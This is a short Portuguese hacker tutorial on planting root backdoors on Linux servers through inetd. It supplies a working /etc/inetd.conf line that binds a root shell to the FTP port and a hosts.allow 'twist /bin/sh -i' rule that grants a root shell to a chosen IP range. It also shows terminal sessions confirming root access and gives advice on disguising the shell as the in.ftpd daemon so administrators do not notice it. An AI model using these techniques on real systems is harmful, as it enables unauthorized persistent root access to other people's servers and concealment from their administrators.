Backdoors no inetd sao uteis por poderem ser acessadas remotamentes
caso o telnetd seja cortado no servidor.
A inetd backdoor mais conhecida eh akela colocada no /etc/inetd.conf.
Vai um exemplo:

ftp stream tcp nowait root /bin/sh sh -i

Nao esqueca de resetar o inetd...

[root@localhost /etc]# killall -1 inetd
[root@localhost /etc]# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
bash# exit
Connection closed by foreign host.
[root@localhost /etc]#

Voce pode camufla-la melhor c copiar o /bin/sh para /usr/sbin/in.ftpd
ou no lugar do daemon que voce substituir. Sohc liga pra nao coloca-la em
cima de um daemon que ja esteja rodando ou o admin vai cata a back logo.
O segundo tipo de inetd backdoor pode ser colocado dentro dos arquivos
de thrusted hosts /etc/hosts.allow e /etc/hosts.deny. Vai o exemplo de
como coloca-las:

in.ftpd : 200.25. : twist /bin/sh -i;

A manha aki eh que todos os que acessarem o ftpd e que tiverem o ip
comecando por 200.25. vao ter acesso a root shell. Esse tipo de backdoor
owna o outro pq aki voce decide quais os ips q terao acesso a backdoor e
pode roda-lo em cima de um daemon q ja esteja sendo usado.

[root@localhost /etc]# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
bash# {.automount,b{in,oot},core,dev,etc,home,l{ib,ost+found},m{isc,nt},opt,proc
,root,sbin,tmp,usr,var} {.automount,b{in,oot},core,dev,etc,home,l{ib,ost+found},
m{isc,nt},opt,proc,

sh: .automount: command not found
bash#
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
bash#
bash# exit
eConnection closed by foreign host.
[root@localhost /etc]#

C bem que eu soh costumo usar esse tipo de backdoor caso o compilador
der pau pra compilar um binder. Mas eu considero o melhor tipo de backdoor
sem precisar programa.